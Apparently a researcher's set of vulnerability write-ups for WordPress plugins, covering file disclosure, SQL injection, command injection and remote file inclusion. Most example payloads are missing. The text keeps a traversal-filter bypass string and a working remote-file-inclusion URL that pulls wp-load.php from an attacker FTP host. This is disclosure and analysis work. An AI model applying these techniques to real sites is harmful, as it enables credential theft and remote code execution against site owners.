WordPress Google Document Embedder arbitrary file disclosure

Advisory

Secunia Advisory SA50832

Analysis of vulnerability

Google Document Embedder offers a proxy for forcing a PDF to download rather than use the default browser handler. It implements this through /libs/pdf.php:

First it will check if allow_url_fopen is enabled. Then it checks the two variables we need to provide, the “fn”(Filename) and “file” GET parameters. If both are provided it will verify that the filename ends in .pdf. From there, it goes onto deicing how to fetch the file, and eventually call into file_get_contents by passing the file GET parameter straight into the call. Note that the filename is only used to determine the filename returned on line 45. Because it will use file_get_contents if at all possible, we can provide a local path to include. We can for instance fetch the wp-config.php file like this:

 

WordPress Duplicator plugin arbitrary file disclosure

Analysis of vulnerability

In version 0.3.0 of WordPress duplicator the file /files/installer.rescue.php and /files/installer.template.php which were added for security reasons. The file was made to download an installer file. They both start with this snippet of code::

If the “get” querystring parameter is set, it will read the file specified by the “file” querystring parameter and read that into the response as installer.php. But because this file is deployed by default to all installations and it does not sanitize the “file” variable, we can use it to read any arbitrary file by making a request like this:

 

WordPress All Video Gallery Plugin SQL injection vulnerability

Advisory

Secunia Advisory SA50874

Analysis of vulnerability

The All Video Gallery Plugin has two pages, playlist.php and /xml/playlist.php, which both takes a “vid” ID and outputs the result from the query into XML format.

Note however that the “vid” GET parameter is never sanitized, which means that we can inject SQL into it and disclose information from the database by making a simple request to either of the pages like this:

 

WordPress FireStorm Professional Real Estate Plugin SQL Injection vulnerability

Advisory

Secunia Advisory SA 50873

Analysis of vulnerability

The FireStorm Professional Real Estate Plugin for WordPress offers functionality for an user to search for real estate based on a province or country. It is implemented in the file search.php:

By either providing a ProvinceID or CountryID, we can make the application pass the value into two SQL queries. Note however that in both cases, the value is taken directly from the GET parameter without sanitazion, which opens it up to a SQL injection attack where we can select arbitrary data from the database. For instance, we can select the password hash for an user like this:

 

WordPress Cimy User Manager arbitrary file disclosure

Advisory

Secunia Advisory SA 50834

Analysis of vulnerability

The Cimy User Manager is made to be able to export data from WordPress. The file cimy_user_manager.php has an init action which decides whether or not to download some content from the site:

First it checks if the cimy_um_filename POST variable is set. Then it goes to check if the referer is from the admin page, which is a flawed way of authentication. But if it thinks you come from the admin page, it will attempt to protect against path traversal. It is pretty obvious that we can fake the referer header. But we can quite easily bypass the path traversal. Lets have a look at an example.

Take this string: …/…//
Now lets see where we match ../:  .../...//
Which leaves us with: ../

This tells us that the path traversal “protection” on line 78 can be bypassed trivially.

Additionally, in the case where you’d want to obtain a wp-config.php file, which contains credentials and other very critical information about the blog, we do not need to bypass this, because when init is called, the working directory is the wordpress base folder, which contains the wp-config.php file. Here’s an example request showing how to pull the wp-config.php file:

 

WordPress Ungallery remote command injection vulnerability

Analysis of vulnerability

The Ungallery for WordPress offers functionality for searching for pictures in a gallery, which is implemented through the plain filesystem in search.php.

Note that the backtick character in PHP has a special meaning, as opposed to the ” and ‘. When you wrap something in 2 backtick characters, it will act as if the contents between them is passed to shell_exec. Note however that the $search variable, which is extracted from the search GET variable, is never sanitized before passed into the exec on line 28. This means that we can pull off a remote command injection with a simple request like this:

 

WordPress Crayon Syntax Highlighter remote file inclusion vulnerability

Advisory

Secunia advisory SA 50804

Analysis of vulnerability

The Crayon Syntax highlighter implements a vulnerable RPC-like system for AJAX in /util/ajax.php and /util/preview.php. Both files share these 3 lines of code as being the first ones in both:

So it apperas that at least it attempts to do some validation. Let us see how that is implemented in global.php(Included by crayon_wp.class.php):

So it calls crayon_is_php_file which checks if the provided path is a file, the extension is “php” and the filename is what is expected, which in this case is wp-load.php. In theory, this should be safe if we assume that is_file only returns true for local file. However due to is_file also supporting FTP, we can get it to return true for a remote file on a FTP server! This means that if the server allows url includes, we can do a remote file include from a malicious FTP server hosting a wp-load.php file through an URL like this, either through ajax.php or preview.php:

http://192.168.80.130/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php

WordPress Zingiri Shop SQL injection vulnerabilities

Advisory
Secunia Advisory SA 49398

Analysis of  vulnerability

This vulnerability relies on a lack of validation in the Zingiri Web Shops IsAdmin function in /fws/includes/subs.inc.php from the fws_cust cookies. The method tries to determine if the user is an admin like this:

It splits(Explode!!) the fws_cust cookie by the # character, extracts a md5′ed password and an userID, and then fetches the corresponding user in the database. Notice however on line 232 and 235 that it does not sanitize the input, leading to a SQL injection. We can abuse this to forge a cookie which gives us admin rights using this simple python script:

Numerous other vulnerabilities were fixed that used same attack vector, as a result of copy paste. These can be found by here quite easily, and exploited the same way.

WordPress GD Star Rating information disclosure vulnerability

Advisory
Secunia Advisory SA 49850

Analysis
The GD Star Rating plugin “allows you to set up advanced rating and review system for post types and comments in your blog using single, multi and thumbs ratings”. Through its admin interface, you can export some data, such as T2 templates and votes. The interesting thing it will allow you to do, is export user data. This will include userID, username, user email address, what vote was casted on which post, when the vote was cast, IP and user agent. However, a flaw exists in the code in export.php which allows for information disclosure of these values.

The file will import some configuration and export classes, and then start figuring out what to export. It then takes the “ex” value to determine the export type, “de” for the data to export(Article or comment data), and then “us” for how much data to export.

It calls into /cls/export.phps export_users function:

Here we see it takes in the “de”, “us”, and further get parameters and starts building up a SQL query to return. What we notice is that at no point so far have we seen any validation that the calling user is an admin. Also we notice that it checks the GET parameters “ip” and “ua”, which are used to toggle whether or not to return the IP and user agent information

Because of the lack of validation of the calling user, we can create an extremely simple request, which will export this data in clear text, including username, email, ip, and user agent.

WordPress Flexi Quote Rotator plugin multiple vulnerabilities

Advisory
Secunia Advisory SA 49910

Analysis
The admin interface of the Flexi Quote Rotator plugin for WordPress implements a way for editing a quote through the displayManagementPage function in /classes/quote-rotator-management.class.php.

It does so by checking the action GET parameter first. If it is “edit”, it will then concatenate the “id” GET parameter into a SQL query, and write the result out to the page. But because it does not correctly sanitize the “id” GET parameter, which causes a SQL injection. Also, this piece of code can be invoked without a nonce, which causes a CSRF vulnerability. Additionally, while it output-encodes the author and quote column, it does not encode the ID. This means we have two options for exploiting these 3 vulnerabilities:

  • Chaining the SQL Injection and the XSS in order to execute javascript in the admins browser
  • Chaining the SQL Injection and the CSRF in order to execute arbitrary SQL blindly

Here is an example of the former, where we trick the admin user into clicking on our specially crafted URL:

The hex value that we use in order to bypass the magic quotes which WordPress enforces was generated this way: